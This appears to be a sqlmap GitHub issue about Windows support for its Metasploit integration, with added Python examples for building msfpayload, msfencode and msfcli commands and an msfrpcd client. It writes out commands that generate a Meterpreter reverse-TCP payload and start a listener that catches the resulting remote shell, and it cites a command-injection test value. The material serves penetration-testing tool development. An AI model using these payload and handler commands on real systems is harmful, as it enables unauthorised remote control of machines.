Open bdamele opened 12 years ago
Sample run:
C:\metasploit>scripts\setenv.bat
C:\metasploit\msf3>ruby msfpayload
Sample generic one-liner run:
<metasploit_install_dir>\scripts\setenv.bat & ruby <metasploit_install_dir>\msf3\msfpayload
Installation directory registry location:
HKEY_LOCAL_MACHINE\SOFTWARE\Rapid7\Metasploit (value: Location)
```python
import os

IS_WIN = os.name == "nt"  # subprocess.mswindows was removed in Python 3.5


def getRegistryValue(key, value):
    """Read a value from HKEY_LOCAL_MACHINE\\<key>; None if missing or not on Windows."""
    retVal = None
    if IS_WIN:
        try:
            try:
                from winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE  # Python 3
            except ImportError:
                from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE  # Python 2
            hive = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
            handle = OpenKey(hive, key)
            # Note the case: the original assigned 'retval', so the function always returned None.
            # Caveat: a 32-bit Python on 64-bit Windows is redirected to SOFTWARE\Wow6432Node.
            retVal = QueryValueEx(handle, value)[0]
        except (ImportError, OSError):  # no winreg module, key/value absent, or access denied
            pass
    return retVal


installDir = getRegistryValue(r"SOFTWARE\Rapid7\Metasploit", "Location")
```
Just for further reference, the commands/forms that need to be supported:
/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 R | /usr/local/bin/msfencode -a x86 -e x86/alpha_mixed -o /home/stamparm/Dropbox/Work/sqlmap/output/192.168.21.129/tmpmcaro -t raw BufferRegister=EAX
/usr/local/bin/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 E
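The two command forms above, built as argv lists instead of a shell string, as an added example (this is not sqlmap's metasploit.py nor code from the thread). The POSIX tool directory, the Windows `ruby <install_dir>\msf3\<tool>` invocation (assumed to run after scripts\setenv.bat has been applied to the environment) and all function names are assumptions for illustration. Every user-controlled value (LHOST, LPORT, EXITFUNC) is validated before it reaches a process, and the msfpayload | msfencode pipe is wired in Python rather than through a shell, so an LHOST like `192.168.21.1; id` can neither be executed nor silently passed on:

```python
import ipaddress
import ntpath
import os
import posixpath
import subprocess

# Constructed assumptions for this example (not sqlmap's own configuration).
POSIX_MSF_DIR = "/usr/local/bin"
VALID_EXITFUNCS = ("process", "thread", "seh", "none")


def validate_target(lhost, lport, exitfunc):
    """Reject values that must never reach a command line.

    All values are passed as argv elements (no shell), but a strict check still
    catches junk such as '192.168.21.1; id' early and with a clear error.
    """
    ipaddress.ip_address(lhost)  # ValueError on anything but an IP literal
    lport = int(lport)
    if not 1 <= lport <= 65535:
        raise ValueError("LPORT out of range: %d" % lport)
    if exitfunc not in VALID_EXITFUNCS:
        raise ValueError("unknown EXITFUNC: %r" % exitfunc)
    return lhost, lport, exitfunc


def msf_tool(tool, msf_dir=None, windows=None):
    """argv prefix for a Metasploit CLI tool; 'windows' defaults to the current platform."""
    if windows is None:
        windows = os.name == "nt"
    if windows:
        if not msf_dir:
            raise ValueError("Metasploit install dir required on Windows (registry Location value)")
        return ["ruby", ntpath.join(msf_dir, "msf3", tool)]
    return [posixpath.join(POSIX_MSF_DIR, tool)]


def payload_argv(payload, lhost, lport, exitfunc="process", msf_dir=None, windows=None):
    """msfpayload <payload> EXITFUNC=.. LPORT=.. LHOST=.. R"""
    lhost, lport, exitfunc = validate_target(lhost, lport, exitfunc)
    return msf_tool("msfpayload", msf_dir, windows) + [
        payload, "EXITFUNC=%s" % exitfunc, "LPORT=%d" % lport, "LHOST=%s" % lhost, "R"]


def encode_argv(outfile, encoder="x86/alpha_mixed", arch="x86", bufreg="EAX",
                msf_dir=None, windows=None):
    """msfencode -a <arch> -e <encoder> -o <outfile> -t raw BufferRegister=<reg>"""
    return msf_tool("msfencode", msf_dir, windows) + [
        "-a", arch, "-e", encoder, "-o", outfile, "-t", "raw", "BufferRegister=%s" % bufreg]


def handler_argv(payload, lhost, lport, exitfunc="process", msf_dir=None, windows=None):
    """msfcli multi/handler PAYLOAD=.. EXITFUNC=.. LPORT=.. LHOST=.. E"""
    lhost, lport, exitfunc = validate_target(lhost, lport, exitfunc)
    return msf_tool("msfcli", msf_dir, windows) + [
        "multi/handler", "PAYLOAD=%s" % payload, "EXITFUNC=%s" % exitfunc,
        "LPORT=%d" % lport, "LHOST=%s" % lhost, "E"]


def generate_encoded_payload(payload, lhost, lport, outfile, msf_dir=None):
    """Run 'msfpayload ... R | msfencode ...' as two processes joined by a pipe.

    Wiring the pipe here instead of handing a string to a shell keeps every
    value an argv element and behaves the same on Windows and POSIX.
    """
    producer = subprocess.Popen(payload_argv(payload, lhost, lport, msf_dir=msf_dir),
                                stdout=subprocess.PIPE)
    consumer = subprocess.Popen(encode_argv(outfile, msf_dir=msf_dir),
                                stdin=producer.stdout, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
    producer.stdout.close()  # only the consumer holds the read end now
    _, err = consumer.communicate()
    producer.wait()
    if producer.returncode or consumer.returncode:
        raise RuntimeError("payload generation failed: %s" % err.decode(errors="replace"))
    return outfile
```

`handler_argv(...)` is meant to be started with `subprocess.Popen` in the background before the payload is delivered; `generate_encoded_payload` only runs where the msfpayload/msfencode binaries exist, the argv builders themselves are pure and platform-independent.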
Consider rewriting the Metasploit integration to interact with the Metasploit RPC interface (msfrpcd) instead of wrapping the msfconsole/msfpayload/msfencode executables.
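What that would involve on the wire, as an added example (not sqlmap's code, not Metasploit's own client library): msfrpcd accepts MessagePack-encoded arrays `[method, arg, ...]` by HTTP POST to `/api/` with `Content-Type: binary/message-pack`, `auth.login` returns a token, and every later call carries that token as its first argument. The small MessagePack encoder/decoder below covers only the types those messages use so the example needs no third-party package; the `MsfRpc` class, its defaults (localhost, port 55553, the msfrpcd default) and the `multi/handler` datastore it sends are assumptions for illustration:

```python
import http.client


def mp_encode(obj):
    """Serialize nil, bool, unsigned int, str, bytes, list and dict to MessagePack."""
    if obj is None:
        return b"\xc0"
    if obj is True:
        return b"\xc3"
    if obj is False:
        return b"\xc2"
    if isinstance(obj, int):
        if 0 <= obj < 0x80:
            return bytes([obj])  # positive fixint
        for width, tag in ((1, b"\xcc"), (2, b"\xcd"), (4, b"\xce")):  # uint 8/16/32
            if 0 <= obj < 1 << (8 * width):
                return tag + obj.to_bytes(width, "big")
        raise ValueError("integer out of supported range: %r" % obj)
    if isinstance(obj, str):
        data = obj.encode("utf-8")
        if len(data) < 32:
            return bytes([0xA0 | len(data)]) + data  # fixstr
        if len(data) < 256:
            return b"\xd9" + bytes([len(data)]) + data  # str 8
        return b"\xda" + len(data).to_bytes(2, "big") + data  # str 16
    if isinstance(obj, bytes):
        if len(obj) < 256:
            return b"\xc4" + bytes([len(obj)]) + obj  # bin 8
        return b"\xc5" + len(obj).to_bytes(2, "big") + obj  # bin 16
    if isinstance(obj, (list, tuple)):
        head = bytes([0x90 | len(obj)]) if len(obj) < 16 else b"\xdc" + len(obj).to_bytes(2, "big")
        return head + b"".join(mp_encode(x) for x in obj)
    if isinstance(obj, dict):
        head = bytes([0x80 | len(obj)]) if len(obj) < 16 else b"\xde" + len(obj).to_bytes(2, "big")
        return head + b"".join(mp_encode(k) + mp_encode(v) for k, v in obj.items())
    raise TypeError("unsupported type: %s" % type(obj).__name__)


def _mp_decode(buf, pos):
    """Decode one object at buf[pos]; return (object, position after it)."""
    tag = buf[pos]
    pos += 1
    if tag < 0x80:
        return tag, pos
    if tag < 0x90:
        return _mp_map(buf, pos, tag & 0x0F)
    if tag < 0xA0:
        return _mp_array(buf, pos, tag & 0x0F)
    if tag < 0xC0:
        n = tag & 0x1F
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if tag == 0xC0:
        return None, pos
    if tag in (0xC2, 0xC3):
        return tag == 0xC3, pos
    if tag in (0xC4, 0xD9):  # bin 8 / str 8
        n = buf[pos]
        data = buf[pos + 1:pos + 1 + n]
        return (bytes(data) if tag == 0xC4 else data.decode("utf-8")), pos + 1 + n
    if tag in (0xC5, 0xDA):  # bin 16 / str 16
        n = int.from_bytes(buf[pos:pos + 2], "big")
        data = buf[pos + 2:pos + 2 + n]
        return (bytes(data) if tag == 0xC5 else data.decode("utf-8")), pos + 2 + n
    if tag in (0xCC, 0xCD, 0xCE):  # uint 8/16/32
        width = 1 << (tag - 0xCC)
        return int.from_bytes(buf[pos:pos + width], "big"), pos + width
    if tag == 0xDC:
        return _mp_array(buf, pos + 2, int.from_bytes(buf[pos:pos + 2], "big"))
    if tag == 0xDE:
        return _mp_map(buf, pos + 2, int.from_bytes(buf[pos:pos + 2], "big"))
    raise ValueError("unsupported MessagePack tag 0x%02x" % tag)


def _mp_array(buf, pos, n):
    items = []
    for _ in range(n):
        item, pos = _mp_decode(buf, pos)
        items.append(item)
    return items, pos


def _mp_map(buf, pos, n):
    result = {}
    for _ in range(n):
        key, pos = _mp_decode(buf, pos)
        result[key], pos = _mp_decode(buf, pos)
    return result, pos


def mp_decode(buf):
    obj, end = _mp_decode(buf, 0)
    if end != len(buf):
        raise ValueError("%d trailing bytes after MessagePack object" % (len(buf) - end))
    return obj


def rpc_request(method, *args):
    """msfrpcd request body: a MessagePack array [method, arg1, ...]."""
    return mp_encode([method] + list(args))


def rpc_result(body):
    """Decode a response; msfrpcd reports failures as {"error": true, "error_message": ...}."""
    result = mp_decode(body)
    if isinstance(result, dict) and result.get("error"):
        raise RuntimeError("msfrpcd: %s" % result.get("error_message", "unknown error"))
    return result


class MsfRpc:
    """Minimal msfrpcd client (hypothetical helper): POST /api/ with binary/message-pack."""

    def __init__(self, host="127.0.0.1", port=55553, ssl_context=None):
        # msfrpcd serves a self-signed certificate by default: pass an ssl.SSLContext
        # that trusts that certificate instead of turning verification off.
        if ssl_context is not None:
            self.conn = http.client.HTTPSConnection(host, port, context=ssl_context, timeout=30)
        else:
            self.conn = http.client.HTTPConnection(host, port, timeout=30)  # msfrpcd started with -S
        self.token = None

    def call(self, method, *args):
        if method != "auth.login":
            args = (self.token,) + args  # every other method takes the session token first
        self.conn.request("POST", "/api/", rpc_request(method, *args),
                          {"Content-Type": "binary/message-pack"})
        return rpc_result(self.conn.getresponse().read())

    def login(self, user, password):
        self.token = self.call("auth.login", user, password)["token"]
        return self.token

    def start_handler(self, payload, lhost, lport, exitfunc="process"):
        """RPC counterpart of the msfcli multi/handler line above, run as a background job."""
        return self.call("module.execute", "exploit", "multi/handler",
                         {"PAYLOAD": payload, "LHOST": lhost, "LPORT": int(lport),
                          "EXITFUNC": exitfunc, "ExitOnSession": False})
```

Typical use is `c = MsfRpc(ssl_context=ctx); c.login("msf", password); c.start_handler("windows/meterpreter/reverse_tcp", "192.168.21.1", 48426)`, after which `job.list` and `session.list` (called the same way through `c.call`) show the handler and any session it catches; nothing is shelled out, so LHOST/LPORT are only ever datastore values, not command-line text.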
Now that Metasploit properly runs on Windows too (without cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, the --os-pwn/--os-smbrelay/--os-smb code needs to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.